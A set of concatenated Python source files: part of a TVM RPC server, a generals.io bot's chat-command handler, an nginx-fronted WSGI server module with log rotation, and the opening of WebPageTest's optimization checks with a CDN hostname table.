Tracker connection
ping_period : float, optional
ping tracker every k seconds if no connection is accepted.
"""
old_keyset = set()
# Report resource to tracker
if tracker_conn:
matchkey = base.random_key(rpc_key + ":")
base.sendjson(tracker_conn,
[TrackerCode.PUT, rpc_key, (port, matchkey), custom_addr])
assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
else:
matchkey = rpc_key
unmatch_period_count = 0
unmatch_timeout = 4
# Wait until we get a valid connection
while True:
if tracker_conn:
trigger = select.select([listen_sock], [], [], ping_period)
if not listen_sock in trigger[0]:
base.sendjson(tracker_conn, [TrackerCode.GET_PENDING_MATCHKEYS])
pending_keys = base.recvjson(tracker_conn)
old_keyset.add(matchkey)
# if match key not in pending key set
# it means the key is acquired by a client but not used.
if matchkey not in pending_keys:
unmatch_period_count += 1
else:
unmatch_period_count = 0
# regenerate match key if key is acquired but not used for a while
if unmatch_period_count * ping_period > unmatch_timeout + ping_period:
logger.info("no incoming connections, regenerate key ...")
matchkey = base.random_key(rpc_key + ":", old_keyset)
base.sendjson(tracker_conn,
[TrackerCode.PUT, rpc_key, (port, matchkey),
custom_addr])
assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
unmatch_period_count = 0
continue
conn, addr = listen_sock.accept()
magic = struct.unpack("<i", base.recvall(conn, 4))[0]
if magic != base.RPC_MAGIC:
conn.close()
continue
keylen = struct.unpack("<i", base.recvall(conn, 4))[0]
key = py_str(base.recvall(conn, keylen))
arr = key.split()
expect_header = "client:" + matchkey
server_key = "server:" + rpc_key
if arr[0] != expect_header:
conn.sendall(struct.pack("<i", base.RPC_CODE_MISMATCH))
conn.close()
logger.info("mismatch key from %s", addr)
continue
else:
conn.sendall(struct.pack("<i", base.RPC_CODE_SUCCESS))
conn.sendall(struct.pack("<i", len(server_key)))
conn.sendall(server_key.encode("utf-8"))
return conn, addr, _parse_server_opt(arr[1:])
# Server logic
tracker_conn = None
while True:
try:
# step 1: setup tracker and report to tracker
if tracker_addr and tracker_conn is None:
tracker_conn = base.connect_with_retry(tracker_addr, silent=silent)
tracker_conn.sendall(struct.pack("<i", base.RPC_TRACKER_MAGIC))
magic = struct.unpack("<i", base.recvall(tracker_conn, 4))[0]
if magic != base.RPC_TRACKER_MAGIC:
raise RuntimeError("%s is not RPC Tracker" % str(tracker_addr))
# report status of current queue
cinfo = {"key" : "server:" + rpc_key}
base.sendjson(tracker_conn,
[TrackerCode.UPDATE_INFO, cinfo])
assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
# step 2: wait for in-coming connections
conn, addr, opts = _accept_conn(sock, tracker_conn)
except (socket.error, IOError):
# retry when tracker is dropped
if tracker_conn:
tracker_conn.close()
tracker_conn = None
continue
except RuntimeError as exc:
if silent:
return
else:
raise exc
# step 3: serving
logger.info("connection from %s", addr)
server_proc = multiprocessing.Process(target=_serve_loop,
args=(conn, addr, load_library, silent))
server_proc.deamon = True
server_proc.start()
# close from our side.
conn.close()
# wait until server process finish or timeout
server_proc.join(opts.get("timeout", None))
if server_proc.is_alive():
logger.info("Timeout in RPC session, kill..")
server_proc.terminate()
def _connect_proxy_loop(addr, key, load_library, silent):
logger = logging.getLogger("RPCProxy")
if silent:
logger.disabled = True
key = "server:" + key
retry_count = 0
max_retry = 5
retry_period = 5
while True:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(addr)
sock.sendall(struct.pack("<i", base.RPC_MAGIC))
sock.sendall(struct.pack("<i", len(key)))
sock.sendall(key.encode("utf-8"))
magic = struct.unpack("<i", base.recvall(sock, 4))[0]
if magic == base.RPC_CODE_DUPLICATE:
raise RuntimeError("key: %s has already been used in proxy" % key)
elif magic == base.RPC_CODE_MISMATCH:
logger.info("RPCProxy do not have matching client key %s", key)
elif magic != base.RPC_CODE_SUCCESS:
raise RuntimeError("%s is not RPC Proxy" % str(addr))
keylen = struct.unpack("<i", base.recvall(sock, 4))[0]
remote_key = py_str(base.recvall(sock, keylen))
opts = _parse_server_opt(remote_key.split()[1:])
logger.info("connected to %s", str(addr))
process = multiprocessing.Process(
target=_serve_loop, args=(sock, addr, load_library, silent))
process.deamon = True
process.start()
sock.close()
process.join(opts.get("timeout", None))
if process.is_alive():
logger.info("Timeout in RPC session, kill..")
process.terminate()
retry_count = 0
except (socket.error, IOError) as err:
retry_count += 1
logger.info("Error encountered %s, retry in %g sec", str(err), retry_period)
if retry_count > max_retry:
raise RuntimeError("Maximum retry error: last error: %s" % str(err))
time.sleep(retry_period)
def _popen(cmd):
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=os.environ)
(out, _) = proc.communicate()
if proc.returncode != 0:
msg = "Server invoke error:\n"
msg += out
raise RuntimeError(msg)
class Server(object):
"""Start RPC server on a seperate process.
This is a simple python implementation based on multi-processing.
It is also possible to implement a similar C based sever with
TVM runtime which does not depend on the python.
Parameters
----------
host : str
The host url of the server.
port : int
The port to be bind to
port_end : int, optional
The end port to search
is_proxy : bool, optional
Whether the address specified is a proxy.
If this is true, the host and port actually corresponds to the
address of the proxy server.
use_popen : bool, optional
Whether to use Popen to start a fresh new process instead of fork.
This is recommended to switch on if we want to do local RPC demonstration
for GPU devices to avoid fork safety issues.
silent: bool, optional
Whether run this server in silent mode.
key : str, optional
The key used to identify the server in Proxy connection.
load_library : str, optional
List of additional libraries to be loaded during execution.
"""
def __init__(self,
host,
port=9091,
port_end=9199,
is_proxy=False,
use_popen=False,
silent=False,
tracker_addr=None,
key="",
load_library=None,
custom_addr=None):
try:
if base._ServerLoop is None:
raise RuntimeError("Please compile with USE_RPC=1")
except NameError:
raise RuntimeError("Please compile with USE_RPC=1")
self.host = host
self.port = port
self.libs = []
self.custom_addr = custom_addr
self.logger = logging.getLogger("RPCServer")
if silent:
self.logger.disabled = True
if use_popen:
cmd = [sys.executable,
"-m", "tvm.exec.rpc_server",
"--host=%s" % host,
"--port=%s" % port]
if tracker_addr:
assert key
cmd += ["--tracker=%s:%d" % tracker_addr,
"--key=%s" % key]
if load_library:
cmd += ["--load-library", load_library]
if custom_addr:
cmd += ["--custom-addr", custom_addr]
if silent:
cmd += ["--silent"]
self.proc = multiprocessing.Process(
target=subprocess.check_call, args=(cmd,))
self.proc.deamon = True
self.proc.start()
time.sleep(0.5)
elif not is_proxy:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = None
for my_port in range(port, port_end):
try:
sock.bind((host, my_port))
self.port = my_port
break
except socket.error as sock_err:
if sock_err.errno in [98, 48]:
continue
else:
raise sock_err
if not self.port:
raise ValueError("cannot bind to any port in [%d, %d)" % (port, port_end))
self.logger.info("bind to %s:%d", host, self.port)
sock.listen(1)
self.sock = sock
self.proc = multiprocessing.Process(
target=_listen_loop, args=(
self.sock, self.port, key, tracker_addr, load_library,
self.custom_addr, silent))
self.proc.deamon = True
self.proc.start()
else:
self.proc = multiprocessing.Process(
target=_connect_proxy_loop, args=((host, port), key, load_library, silent))
self.proc.deamon = True
self.proc.start()
def terminate(self):
"""Terminate the server process"""
if self.proc:
self.proc.terminate()
self.proc = None
def __del__(self):
self.terminate()
|
bot_cmds.py
|
"""
@ Harris Christiansen (code@HarrisChristiansen.com)
Generals.io Automated Client - https://github.com/harrischristiansen/generals-bot
Generals.io Bot Commands
"""
import random
import threading
import time
from .constants import *
from . import generals_api
class BotCommands(object):
def __init__(self, bot):
self._bot = bot
self._permitted_username = ""
self._map = None
def set_map(self, game_map):
self._map = game_map
# ======================== Bot Commands ======================== #
def _get_command(self, msg, is_from_chat, username):
msg_lower = msg.lower()
command = msg.split(' ')
command_len = len(command)
if command_len == 1:
command = command[0].split(':') # Handle : delimiters
base_command = command[0].lower()
arg_command = " ".join(command[1:])
# Handle directed commands (ex: myssix pause)
if command_len > 1 and "_map" in dir(self) and "usernames" in dir(self._map):
if base_command == self._map.usernames[self._map.player_index].lower():
command = command[1:]
command_len = len(command)
base_command = command[0].lower()
arg_command = " ".join(command[1:])
return msg, msg_lower, command, command_len, base_command, arg_command, is_from_chat, username
def handle_command(self, msg, is_from_chat=False, username=""):
command_list = self._get_command(msg, is_from_chat, username)
if self._handle_start_command(command_list):
return True
if self._handle_chat_command(command_list):
return True
if self._handle_unrestricted_command(command_list):
return True
if self._handle_restricted_command(command_list):
return True
return False
def _handle_start_command(self, command_list):
(msg, msg_lower, command, command_len, base_command, arg_command, is_from_chat, username) = command_list
if len(msg) < 12 and any(k in msg_lower for k in START_KEYWORDS):
self._bot.send_forcestart(delay=0)
self._bot.is_paused = False
return True
if len(msg) < 2:
return True
return False
def _handle_chat_command(self, command_list):
(msg, msg_lower, command, command_len, base_command, arg_command, is_from_chat, username) = command_list
if self._handle_player_command(msg, username):
return True
if base_command.startswith(tuple(HELP_KEYWORDS)):
self._print_command_help(is_from_chat)
return True
if base_command.startswith(tuple(HELLO_KEYWORDS)):
self._print_command_hello()
return True
return False
def _handle_unrestricted_command(self, command_list):
(msg, msg_lower, command, command_len, base_command, arg_command, is_from_chat, username) = command_list
if "setup" in base_command:
self._bot.set_game_speed(4)
self._set_game_map()
self._bot.set_game_public()
return True
if "speed" in base_command and command_len >= 2 and command[1][0].isdigit():
self._bot.set_game_speed(command[1][0])
return True
if "public" in base_command:
self._bot.set_game_public()
return True
return False
def _handle_restricted_command(self, command_list):
(msg, msg_lower, command, command_len, base_command, arg_command, is_from_chat, username) = command_list
if self._permitted_username != "" and self._permitted_username != username: # Only allow permitted user
return False
if self._handle_setup_command(command_list):
return True
if self._handle_game_command(command_list):
return True
return False
def _handle_setup_command(self, command_list):
(msg, msg_lower, command, command_len, base_command, arg_command, is_from_chat, username) = command_list
if "map" in base_command:
if command_len >= 2:
self._set_game_map(arg_command)
else:
self._set_game_map()
return True
elif "normal" in base_command:
self._set_normal_map()
return True
elif "maxsize" in base_command:
self._bot.set_normal_map(width=1.0, height=1.0)
return True
elif "mincity" in base_command:
self._bot.set_normal_map(city=0.0)
return True
elif "maxcity" in base_command:
self._bot.set_normal_map(city=1.0)
return True
elif "minmountain" in base_command:
self._bot.set_normal_map(mountain=0.0)
return True
elif "maxmountain" in base_command:
self._bot.set_normal_map(mountain=1.0)
return True
elif "maxswamp" in base_command:
self._bot.set_normal_map(swamp=1.0)
return True
elif "maxall" in base_command:
self._bot.set_normal_map(1.0, 1.0, 1.0, 1.0, 1.0)
return True
elif "width" in base_command:
if command_len == 2:
try:
self._bot.set_normal_map(width=float(arg_command))
return True
except ValueError:
pass
self._bot.set_normal_map(width=1.0)
return True
elif "height" in base_command:
if command_len == 2:
try:
self._bot.set_normal_map(height=float(arg_command))
return True
except ValueError:
pass
self._bot.set_normal_map(height=1.0)
return True
elif "city" in base_command:
if command_len == 2:
try:
self._bot.set_normal_map(city=float(arg_command))
return True
except ValueError:
pass
self._bot.set_normal_map(city=1.0)
return True
elif "mountain" in base_command:
if command_len == 2:
try:
self._bot.set_normal_map(mountain=float(arg_command))
return True
except ValueError:
pass
self._bot.set_normal_map(mountain=1.0)
return True
elif "swamp" in base_command:
if command_len == 2:
try:
self._set_swamp_map(float(arg_command))
return True
except ValueError:
pass
self._set_swamp_map()
return True
elif is_from_chat and len(msg) < 12 and "map" in msg_lower:
self._set_game_map()
return True
return False
def _handle_game_command(self, command_list):
(msg, msg_lower, command, command_len, base_command, arg_command, is_from_chat, username) = command_list
if "take" in base_command and username != "":
self._permitted_username = username
elif "team" in base_command:
if command_len >= 2:
if len(command[1]) == 1:
self._bot.set_game_team(command[1])
else:
return self._add_teammate(arg_command)
elif base_command in ["unteamall"]:
self._remove_all_teammates()
elif base_command in ["unteam", "cancelteam"]:
self._remove_teammate(username)
elif base_command in ["noteam"]:
_spawn(self._start_avoiding_team)
else:
return self._add_teammate(username)
return True
elif "bye!" in base_command:
if "_map" in dir(self):
# self._map.exit_on_game_over = False # Wait 2 minutes before exiting
self._bot.send_surrender()
return True
elif "unpause" in base_command:
self._bot.is_paused = False
return True
elif "pause" in base_command:
self._bot.is_paused = True
return True
return False
# ======================== Sending Messages ======================== #
def _print_command_help(self, is_from_chat=False):
if is_from_chat:
self._bot.sent_hello = True
for txt in GAME_HELP_TEXT if "_map" in dir(self) else PRE_HELP_TEXT:
self._bot.send_chat(txt)
time.sleep(0.34)
else:
print("\n".join(GAME_HELP_TEXT if "_map" in dir(self) else PRE_HELP_TEXT))
def _print_command_hello(self):
if "sent_hello" in dir(self._bot):
return True
self._bot.sent_hello = True
for txt in GAME_HELLO_TEXT if "_map" in dir(self) else HELLO_TEXT:
self._bot.send_chat(txt)
time.sleep(0.34)
# ======================== Teammates ======================== #
def _add_teammate(self, username):
if "_map" in dir(self) and "usernames" in dir(self._map):
if username != "" and username != self._map.usernames[self._map.player_index] and \
username in self._map.usernames:
self._map.do_not_attack_players.append(self._map.usernames.index(username))
return True
return False
def _remove_teammate(self, username):
if "_map" in dir(self) and "usernames" in dir(self._map):
if username != "" and username != self._map.usernames[self._map.player_index]:
if self._map.usernames.index(username) in self._map.do_not_attack_players:
self._map.do_not_attack_players.remove(self._map.usernames.index(username))
return True
return False
def _remove_all_teammates(self):
self._map.do_not_attack_players = []
return True
def _start_avoiding_team(self):
while True:
if "teams" not in dir(self._bot):
time.sleep(0.1)
continue
for i, members in self._bot.teams.items():
if self._bot.username in members:
if len(members) > 1: # More than 1 person on bots team
for team in range(1, MAX_NUM_TEAMS + 1):
if team not in self._bot.teams:
self._bot.set_game_team(team)
break
time.sleep(0.1)
# ======================== Set Custom Gamemap ======================== #
def _set_game_map(self, map_name=""):
if len(map_name) > 1:
map_lower = map_name.lower()
if map_lower in ["win", "good"]:
self._bot.set_game_map(random.choice(GENERALS_MAPS))
elif map_lower == "top":
self._bot.set_game_map(random.choice(generals_api.list_top()))
elif map_lower == "hot":
self._bot.set_game_map(random.choice(generals_api.list_hot()))
else:
maps = generals_api.list_search(map_name)
if map_name in maps:
self._bot.set_game_map(map_name)
elif len(maps) >= 1:
self._bot.set_game_map(maps[0])
self._bot.send_chat("I could not find " + map_name + ", so I set the map to " + maps[
0] + " (Note: names are case sensitive)")
else:
self._bot.send_chat("Could not find map named " + map_name + " (Note: names are case sensitive)")
else:
self._bot.set_game_map(random.choice(generals_api.list_both()))
def _set_normal_map(self):
width = round(random.uniform(0, 1), 2)
height = round(random.uniform(0, 1), 2)
city = round(random.uniform(0, 1), 2)
mountain = round(random.uniform(0, 1), 2)
self._bot.set_normal_map(width, height, city, mountain)
def _set_swamp_map(self, swamp=-1):
if swamp == -1:
swamp = round(random.uniform(0, 1), 2)
if 0 <= swamp <= 1:
self._bot.set_normal_map(swamp=swamp)
# ======================== Player Requested Commands ======================== #
def _handle_player_command(self, msg, username):
if "boomer" in username.lower():
self._bot.send_chat("Okay Boomer <3")
return True
return False
def _spawn(f):
t = threading.Thread(target=f)
t.daemon = True
t.start()
|
NGINXApiModule.py
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
from multiprocessing import Process
from gevent.pywsgi import WSGIServer
import subprocess
import gevent
from signal import SIGUSR1
import requests
from flask.logging import default_handler
from typing import Any, Dict
import os
import traceback
from string import Template
class Handler:
@staticmethod
def write(msg: str):
demisto.info(msg)
class ErrorHandler:
@staticmethod
def write(msg: str):
demisto.error(f'wsgi error: {msg}')
DEMISTO_LOGGER: Handler = Handler()
ERROR_LOGGER: ErrorHandler = ErrorHandler()
# nginx server params
NGINX_SERVER_ACCESS_LOG = '/var/log/nginx/access.log'
NGINX_SERVER_ERROR_LOG = '/var/log/nginx/error.log'
NGINX_SERVER_CONF_FILE = '/etc/nginx/conf.d/default.conf'
NGINX_SSL_KEY_FILE = '/etc/nginx/ssl/ssl.key'
NGINX_SSL_CRT_FILE = '/etc/nginx/ssl/ssl.crt'
NGINX_SSL_CERTS = f'''
ssl_certificate {NGINX_SSL_CRT_FILE};
ssl_certificate_key {NGINX_SSL_KEY_FILE};
'''
NGINX_SERVER_CONF = '''
server {
listen $port default_server $ssl;
$sslcerts
proxy_cache_key $scheme$proxy_host$request_uri$extra_cache_key;
$proxy_set_range_header
# Static test file
location = /nginx-test {
alias /var/lib/nginx/html/index.html;
default_type text/html;
}
# Proxy everything to python
location / {
proxy_pass http://localhost:$serverport/;
add_header X-Proxy-Cache $upstream_cache_status;
# allow bypassing the cache with an arg of nocache=1 ie http://server:7000/?nocache=1
proxy_cache_bypass $arg_nocache;
proxy_read_timeout 1800;
proxy_connect_timeout 1800;
proxy_send_timeout 1800;
send_timeout 1800;
}
}
'''
def create_nginx_server_conf(file_path: str, port: int, params: Dict):
"""Create nginx conf file
Args:
file_path (str): path of server conf file
port (int): listening port. server port to proxy to will be port+1
params (Dict): additional nginx params
Raises:
DemistoException: raised if there is a detected config error
"""
params = demisto.params() if not params else params
template_str = params.get('nginx_server_conf') or NGINX_SERVER_CONF
certificate: str = params.get('certificate', '')
private_key: str = params.get('key', '')
ssl = ''
sslcerts = ''
serverport = port + 1
proxy_set_range_header = ''
extra_cache_keys = []
if (certificate and not private_key) or (private_key and not certificate):
raise DemistoException('If using HTTPS connection, both certificate and private key should be provided.')
if certificate and private_key:
demisto.debug('Using HTTPS for nginx conf')
with open(NGINX_SSL_CRT_FILE, 'wt') as f:
f.write(certificate)
with open(NGINX_SSL_KEY_FILE, 'wt') as f:
f.write(private_key)
ssl = 'ssl' # to be included in the listen directive
sslcerts = NGINX_SSL_CERTS
credentials = params.get('credentials') or {}
if credentials.get('identifier'):
extra_cache_keys.append("$http_authorization")
if get_integration_name() == 'TAXII2 Server':
extra_cache_keys.append("$http_accept")
if params.get('version') == '2.0':
proxy_set_range_header = 'proxy_set_header Range $http_range;'
extra_cache_keys.extend(['$http_range', '$http_content_range'])
extra_cache_keys_str = ''.join(extra_cache_keys)
server_conf = Template(template_str).safe_substitute(port=port, serverport=serverport, ssl=ssl,
sslcerts=sslcerts, extra_cache_key=extra_cache_keys_str,
proxy_set_range_header=proxy_set_range_header)
with open(file_path, mode='wt+') as f:
f.write(server_conf)
def start_nginx_server(port: int, params: Dict = {}) -> subprocess.Popen:
params = demisto.params() if not params else params
create_nginx_server_conf(NGINX_SERVER_CONF_FILE, port, params)
nginx_global_directives = 'daemon off;'
global_directives_conf = params.get('nginx_global_directives')
if global_directives_conf:
nginx_global_directives = f'{nginx_global_directives} {global_directives_conf}'
directive_args = ['-g', nginx_global_directives]
# we first do a test that all config is good and log it
try:
nginx_test_command = ['nginx', '-T']
nginx_test_command.extend(directive_args)
test_output = subprocess.check_output(nginx_test_command, stderr=subprocess.STDOUT, text=True)
demisto.info(f'ngnix test passed. command: [{nginx_test_command}]')
demisto.debug(f'nginx test ouput:\n{test_output}')
except subprocess.CalledProcessError as err:
raise ValueError(f"Failed testing nginx conf. Return code: {err.returncode}. Output: {err.output}")
nginx_command = ['nginx']
nginx_command.extend(directive_args)
res = subprocess.Popen(nginx_command, text=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
demisto.info(f'done starting nginx with pid: {res.pid}')
return res
def nginx_log_process(nginx_process: subprocess.Popen):
try:
old_access = NGINX_SERVER_ACCESS_LOG + '.old'
old_error = NGINX_SERVER_ERROR_LOG + '.old'
log_access = False
log_error = False
# first check if one of the logs are missing. This may happen on rare ocations that we renamed and deleted the file
# before nginx completed the role over of the logs
missing_log = False
if not os.path.isfile(NGINX_SERVER_ACCESS_LOG):
missing_log = True
demisto.info(f'Missing access log: {NGINX_SERVER_ACCESS_LOG}. Will send roll signal to nginx.')
if not os.path.isfile(NGINX_SERVER_ERROR_LOG):
missing_log = True
demisto.info(f'Missing error log: {NGINX_SERVER_ERROR_LOG}. Will send roll signal to nginx.')
if missing_log:
nginx_process.send_signal(int(SIGUSR1))
demisto.info(f'Done sending roll signal to nginx (pid: {nginx_process.pid}) after detecting missing log file.'
' Will skip this iteration.')
return
if os.path.getsize(NGINX_SERVER_ACCESS_LOG):
log_access = True
os.rename(NGINX_SERVER_ACCESS_LOG, old_access)
if os.path.getsize(NGINX_SERVER_ERROR_LOG):
log_error = True
os.rename(NGINX_SERVER_ERROR_LOG, old_error)
if log_access or log_error:
# nginx rolls the logs when getting sigusr1
nginx_process.send_signal(int(SIGUSR1))
gevent.sleep(0.5) # sleep 0.5 to let nginx complete the roll
if log_access:
with open(old_access, 'rt') as f:
start = 1
for lines in batch(f.readlines(), 100):
end = start + len(lines)
demisto.info(f'nginx access log ({start}-{end-1}): ' + ''.join(lines))
start = end
os.unlink(old_access)
if log_error:
with open(old_error, 'rt') as f:
start = 1
for lines in batch(f.readlines(), 100):
end = start + len(lines)
demisto.error(f'nginx error log ({start}-{end-1}): ' + ''.join(lines))
start = end
os.unlink(old_error)
except Exception as e:
demisto.error(f'Failed nginx log processing: {e}. Exception: {traceback.format_exc()}')
def nginx_log_monitor_loop(nginx_process: subprocess.Popen):
"""An endless loop to monitor nginx logs. Meant to be spawned as a greenlet.
Will run every minute and if needed will dump the nginx logs and roll them if needed.
Args:
nginx_process (subprocess.Popen): the nginx process. Will send signal for log rolling.
"""
while True:
gevent.sleep(60)
nginx_log_process(nginx_process)
def test_nginx_server(port: int, params: Dict):
nginx_process = start_nginx_server(port, params)
# let nginx startup
time.sleep(0.5)
try:
protocol = 'https' if params.get('key') else 'http'
res = requests.get(f'{protocol}://localhost:{port}/nginx-test',
verify=False, proxies={"http": "", "https": ""}) # nosec guardrails-disable-line
res.raise_for_status()
welcome = 'Welcome to nginx'
if welcome not in res.text:
raise ValueError(f'Unexpected response from nginx-text (does not contain "{welcome}"): {res.text}')
finally:
try:
nginx_process.terminate()
nginx_process.wait(1.0)
except Exception as ex:
demisto.error(f'failed stoping test nginx process: {ex}')
def try_parse_integer(int_to_parse: Any, err_msg: str) -> int:
"""
Tries to parse an integer, and if fails will throw DemistoException with given err_msg
"""
try:
res = int(int_to_parse)
except (TypeError, ValueError):
raise DemistoException(err_msg)
return res
def get_params_port(params: Dict = None) -> int:
"""
Gets port from the integration parameters
"""
params = demisto.params() if not params else params
port_mapping: str = params.get('longRunningPort', '')
err_msg: str
port: int
if port_mapping:
err_msg = f'Listen Port must be an integer. {port_mapping} is not valid.'
if ':' in port_mapping:
port = try_parse_integer(port_mapping.split(':')[1], err_msg)
else:
port = try_parse_integer(port_mapping, err_msg)
else:
raise ValueError('Please provide a Listen Port.')
return port
def run_long_running(params: Dict = None, is_test: bool = False):
"""
Start the long running server
:param params: Demisto params
:param is_test: Indicates whether it's test-module run or regular run
:return: None
"""
params = demisto.params() if not params else params
nginx_process = None
nginx_log_monitor = None
try:
nginx_port = get_params_port()
server_port = nginx_port + 1
# set our own log handlers
APP.logger.removeHandler(default_handler) # type: ignore[name-defined] # pylint: disable=E0602
integration_logger = IntegrationLogger()
integration_logger.buffering = False
log_handler = DemistoHandler(integration_logger)
log_handler.setFormatter(
logging.Formatter("flask log: [%(asctime)s] %(levelname)s in %(module)s: %(message)s")
)
APP.logger.addHandler(log_handler) # type: ignore[name-defined] # pylint: disable=E0602
demisto.debug('done setting demisto handler for logging')
server = WSGIServer(('0.0.0.0', server_port),
APP, log=DEMISTO_LOGGER, # type: ignore[name-defined] # pylint: disable=E0602
error_log=ERROR_LOGGER)
if is_test:
test_nginx_server(nginx_port, params)
server_process = Process(target=server.serve_forever)
server_process.start()
time.sleep(5)
try:
server_process.terminate()
server_process.join(1.0)
except Exception as ex:
demisto.error(f'failed stoping test wsgi server process: {ex}')
else:
nginx_process = start_nginx_server(nginx_port, params)
nginx_log_monitor = gevent.spawn(nginx_log_monitor_loop, nginx_process)
demisto.updateModuleHealth('')
server.serve_forever()
except Exception as e:
error_message = str(e)
demisto.error(f'An error occurred: {error_message}. Exception: {traceback.format_exc()}')
demisto.updateModuleHealth(f'An error occurred: {error_message}')
raise ValueError(error_message)
finally:
if nginx_process:
try:
nginx_process.terminate()
except Exception as ex:
demisto.error(f'Failed stopping nginx process when exiting: {ex}')
if nginx_log_monitor:
try:
nginx_log_monitor.kill(timeout=1.0)
except Exception as ex:
demisto.error(f'Failed stopping nginx_log_monitor when exiting: {ex}')
|
optimization_checks.py
|
# Copyright 2019 WebPageTest LLC.
# Copyright 2017 Google Inc.
# Use of this source code is governed by the Apache 2.0 license that can be
# found in the LICENSE file.
"""Run the various optimization checks"""
import binascii
import gzip
import logging
import multiprocessing
import os
import re
import shutil
import struct
import subprocess
import sys
import threading
import time
if (sys.version_info > (3, 0)):
from time import monotonic
GZIP_TEXT = 'wt'
unicode = str
else:
from monotonic import monotonic
GZIP_TEXT = 'w'
try:
import ujson as json
except BaseException:
import json
class OptimizationChecks(object):
"""Threaded optimization checks"""
def __init__(self, job, task, requests):
self.job = job
self.task = task
self.running_checks = False
self.requests = requests
self.cdn_thread = None
self.hosting_thread = None
self.gzip_thread = None
self.image_thread = None
self.progressive_thread = None
self.font_thread = None
self.cdn_time = None
self.hosting_time = None
self.gzip_time = None
self.image_time = None
self.progressive_time = None
self.font_time = None
self.cdn_results = {}
self.hosting_results = {}
self.gzip_results = {}
self.image_results = {}
self.progressive_results = {}
self.font_results = {}
self.results = {}
self.dns_lookup_queue = multiprocessing.JoinableQueue()
self.dns_result_queue = multiprocessing.JoinableQueue()
self.fetch_queue = multiprocessing.JoinableQueue()
self.fetch_result_queue = multiprocessing.JoinableQueue()
# spell-checker: disable
self.cdn_cnames = {
'Advanced Hosters CDN': ['.pix-cdn.org'],
'afxcdn.net': ['.afxcdn.net'],
'Akamai': ['.akamai.net',
'.akamaized.net',
'.akamaized-staging.net',
'.akamaiedge.net',
'.akamaiedge-staging.net',
'.akamaihd.net',
'.edgesuite.net',
'.edgesuite-staging.net',
'.edgekey.net',
'.edgekey-staging.net',
'.srip.net',
'.akamaitechnologies.com',
'.akamaitechnologies.fr'],
'Akamai China CDN': ['.tl88.net'],
'Alimama': ['.gslb.tbcache.com'],
'Amazon CloudFront': ['.cloudfront.net'],
'Aryaka': ['.aads1.net',
'.aads-cn.net',
'.aads-cng.net'],
'AT&T': ['.att-dsa.net'],
'Automattic': ['.wp.com',
'.wordpress.com',
'.gravatar.com'],
'Azion': ['.azioncdn.net',
'.azioncdn.com',
'.azion.net'],
'BelugaCDN': ['.belugacdn.com',
'.belugacdn.link'],
'Bison Grid': ['.bisongrid.net'],
'BitGravity': ['.bitgravity.com'],
'Blue Hat Network': ['.bluehatnetwork.com'],
'BO.LT': ['bo.lt'],
'BunnyCDN': ['.b-cdn.net'],
'Cachefly': ['.cachefly.net'],
'Caspowa': ['.caspowa.com'],
'Cedexis': ['.cedexis.net'],
'CDN77': ['.cdn77.net',
'.cdn77.org'],
'CDNetworks': ['.cdngc.net',
'.gccdn.net',
'.panthercdn.com'],
'CDNsun': ['.cdnsun.net'],
'CDNvideo': ['.cdnvideo.ru',
'.cdnvideo.net'],
'ChinaCache': ['.ccgslb.com'],
'ChinaNetCenter': ['.lxdns.com',
'.wscdns.com',
'.wscloudcdn.com',
'.ourwebpic.com'],
'Cloudflare': ['.cloudflare.com',
'.cloudflare.net'],
'Cotendo CDN': ['.cotcdn.net'],
'cubeCDN': ['.cubecdn.net'],
'Edgecast': ['edgecastcdn.net',
'.systemcdn.net',
'.transactcdn.net',
'.v1cdn.net',
'.v2cdn.net',
'.v3cdn.net',
'.v4cdn.net',
'.v5cdn.net'],
'Facebook': ['.facebook.com',
'.facebook.net',
'.fbcdn.net',
'.cdninstagram.com'],
'Fastly': ['.fastly.net',
'.fastlylb.net',
'.nocookie.net'],
'GoCache': ['.cdn.gocache.net'],
'Google': ['.google.',
'googlesyndication.',
'youtube.',
'.googleusercontent.com',
'googlehosted.com',
'.gstatic.com',
'.googleapis.com',
'.doubleclick.net'],
'HiberniaCDN': ['.hiberniacdn.com'],
'Highwinds': ['hwcdn.net'],
'Hosting4CDN': ['.hosting4cdn.com'],
'ImageEngine': ['.imgeng.in'],
'Incapsula': ['.incapdns.net'],
'Instart Logic': ['.insnw.net',
'.inscname.net'],
'Internap': ['.internapcdn.net'],
'jsDelivr': ['cdn.jsdelivr.net'],
'KeyCDN': ['.kxcdn.com'],
'KINX CDN': ['.kinxcdn.com',
'.kinxcdn.net'],
'LeaseWeb CDN': ['.lswcdn.net',
'.lswcdn.eu'],
'Level 3': ['.footprint.net',
'.fpbns.net'],
'Limelight': ['.llnwd.net',
'.llnw.net',
'.llnwi.net',
'.lldns.net'],
'MediaCloud': ['.cdncloud.net.au'],
'Medianova': ['.mncdn.com',
'.mncdn.net',
'.mncdn.org'],
'Microsoft Azure': ['.vo.msecnd.net',
'.azureedge.net',
'.azurefd.net',
'.azure.microsoft.com',
'-msedge.net'],
'Mirror Image': ['.instacontent.net',
'.mirror-image.net'],
'NetDNA': ['.netdna-cdn.com',
'.netdna-ssl.com',
'.netdna.com'],
'Netlify': ['.netlify.com'],
'NGENIX': ['.ngenix.net'],
'NYI FTW': ['.nyiftw.net',
'.nyiftw.com'],
'OnApp': ['.r.worldcdn.net',
'.r.worldssl.net'],
'Optimal CDN': ['.optimalcdn.com'],
'PageCDN': ['pagecdn.io'],
'PageRain': ['.pagerain.net'],
'Pressable CDN': ['.pressablecdn.com'],
'PUSHR': ['.pushrcdn.com'],
'Rackspace': ['.raxcdn.com'],
'Reapleaf': ['.rlcdn.com'],
'Reflected Networks': ['.rncdn1.com',
'.rncdn7.com'],
'ReSRC.it': ['.resrc.it'],
'Rev Software': ['.revcn.net',
'.revdn.net'],
'Roast.io': ['.roast.io'],
'Rocket CDN': ['.streamprovider.net'],
'section.io': ['.squixa.net'],
'SFR': ['cdn.sfr.net'],
'SwiftyCDN': ['.swiftycdn.net'],
'Simple CDN': ['.simplecdn.net'],
'Singular CDN': ['.singularcdn.net.br'],
'Sirv CDN': ['.sirv.com'],
'StackPath': ['.stackpathdns.com'],
